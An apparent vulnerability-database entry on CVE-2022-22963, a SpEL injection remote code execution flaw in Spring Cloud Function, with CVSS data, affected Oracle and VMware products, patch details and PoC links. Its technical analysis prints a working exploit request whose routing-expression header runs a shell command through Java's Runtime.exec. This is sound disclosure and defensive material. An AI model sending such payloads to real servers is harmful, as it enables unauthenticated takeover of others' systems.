CVE-2022-22963

Description

In Spring Cloud Function versions 3.1.6, 3.2.2 and older unsupported versions, when using routing functionality it is possible for a user to provide a specially crafted SpEL as a routing-expression that may result in remote code execution and access to local resources.

Add Assessment

zeroSteiner (340)

March 30, 2022 8:46pm UTC (2 years ago)•

Ratings

Attacker Value

Medium

Exploitability

Very High

Easy to weaponize Unauthenticated Vulnerable in default configuration

Technical Analysis

CVE-2022-22963 is an unauthenticated remote code execution vulnerability within Spring Cloud Function prior to 3.1.7 and 3.2.3. This vulnerability should not be confused with the reported 0-day dubbed Spring4Shell that was disclosed at around the same time.

The cause of this vulnerability is an unsafe evaluation context for the Spring Expression Language (SpEL) that can be included in the spring.cloud.function.routing-expression header. By crafting a POST request with the header, an attacker may execute malicious SpEL queries resulting in code execution in the context of the Spring Cloud Function application.

One early PoC demonstrated that the SpEL query could be used to execute an OS command through the Java Runtime. The following example echos to the /tmp/success file. It differs from the original by using an array of strings for the arguments passed to exec. Because the header value is an SpEL query, single quotes should be escaped by doubling them.

POST /functionRouter HTTP/1.1
Host: 192.168.159.128:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','echo "hello world" >> /tmp/msf-success'})
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

On successful exploitation, the server responds with a 500 error and a JSON response.

HTTP/1.1 500 Internal Server Error
Content-Type: application/json
Content-Length: 153

{"timestamp":"2022-03-30T20:41:28.551+00:00","path":"/functionRouter","status":500,"error":"Internal Server Error","message":"","requestId":"8fed4100-1"}

The response from a server that was patched for the vulnerability (versions 3.1.7 and 3.2.3) is identical.

The vulnerability was patched on March, 29th, 2022 in commit bcb2a25a. The patch adds a second evaluation context and uses it when the SpEL query originates from the HTTP request header. The SimpleEvaluationContext is used when the query originates from a header.

SimpleEvaluationContext is tailored to support only a subset of the SpEL language syntax, e.g. excluding references to Java types, constructors, and bean references.

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

9.8 Critical

Impact Score:

5.9

Exploitability Score:

3.9

Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

None

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

High

Availability (A):

High

Vendors

oracle,
vmware

Products

banking branch 14.5,
banking cash management 14.5,
banking corporate lending process management 14.5,
banking credit facilities process management 14.5,
banking electronic data exchange for corporates 14.5,
banking liquidity management 14.2,
banking liquidity management 14.5,
banking origination 14.5,
banking supply chain finance 14.5,
banking trade finance process management 14.5,
banking virtual account management 14.5,
communications cloud native core automated test suite 1.9.0,
communications cloud native core automated test suite 22.1.0,
communications cloud native core console 1.9.0,
communications cloud native core console 22.1.0,
communications cloud native core network exposure function 22.1.0,
communications cloud native core network function cloud native environment 1.10.0,
communications cloud native core network function cloud native environment 22.1.0,
communications cloud native core network function cloud native environment 22.1.2,
communications cloud native core network repository function 1.15.0,
communications cloud native core network repository function 22.1.0,
communications cloud native core network slice selection function 1.8.0,
communications cloud native core network slice selection function 22.1.0,
communications cloud native core policy 1.15.0,
communications cloud native core policy 22.1.0,
communications cloud native core policy 22.1.3,
communications cloud native core security edge protection proxy 1.7.0,
communications cloud native core security edge protection proxy 22.1.0,
communications cloud native core unified data repository 1.15.0,
communications cloud native core unified data repository 22.1.0,
communications communications policy management 12.6.0.0.0,
financial services analytical applications infrastructure 8.1.1.0,
financial services analytical applications infrastructure 8.1.2.0,
financial services behavior detection platform 8.1.1.0,
financial services behavior detection platform 8.1.1.1,
financial services behavior detection platform 8.1.2.0,
financial services enterprise case management 8.1.1.0,
financial services enterprise case management 8.1.1.1,
financial services enterprise case management 8.1.2.0,
mysql enterprise monitor,
product lifecycle analytics 3.6.1.0,
retail xstore point of service 20.0.1,
retail xstore point of service 21.0.0,
sd-wan edge 9.0,
sd-wan edge 9.1,
spring cloud function

Metasploit Modules

exploit/multi/http/spring_cloud_function_spel_injection (https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/spring_cloud_function_spel_injection.rb)

Exploited in the Wild

Reported by:

mkienow-r7 indicated source as Government or Industry Alert (https://www.cisa.gov/known-exploited-vulnerabilities-catalog)

Reported: August 25, 2022 7:42pm UTC (2 years ago)

gwillcox-r7 indicated source as News Article or Blog (https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/)

Reported: August 28, 2022 8:03pm UTC (2 years ago)

AttackerKB Worker indicated source as Government or Industry Alert (https://www.cisa.gov/news-events/alerts/2022/08/25/cisa-adds-ten-known-exploited-vulnerabilities-catalog)

Reported: November 08, 2024 8:24am UTC (1 week ago)

References

Canonical

CVE-2022-22963 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963)

Advisory

20220401 Vulnerability in Spring Cloud Function Framework Affecting Cisco Products: March 2022 (https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-java-spring-scf-rce-DQrHhJxH)

https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0005

Exploit

PoCs that have not been added by contributors directly have been sourced from: nomi-sec/PoC-in-GitHub.
A PoC added here by the AKB Worker must have at least 2 GitHub stars.

spring-spel-0day-poc (https://github.com/hktalent/spring-spel-0day-poc) (Added by AKB Worker)

CVE-2022-22963 (https://github.com/dinosn/CVE-2022-22963) (Added by AKB Worker)

CVE-2022-22963 (https://github.com/RanDengShiFu/CVE-2022-22963) (Added by AKB Worker)

Miscellaneous

https://tanzu.vmware.com/security/cve-2022-22963

https://www.oracle.com/security-alerts/cpuapr2022.html

https://www.oracle.com/security-alerts/cpujul2022.html

http://packetstormsecurity.com/files/173430/Spring-Cloud-3.2.2-Remote-Command-Execution.html

Rapid7

Moderate

Moderate

Very High

None

None

Network

CVE-2022-22963

Description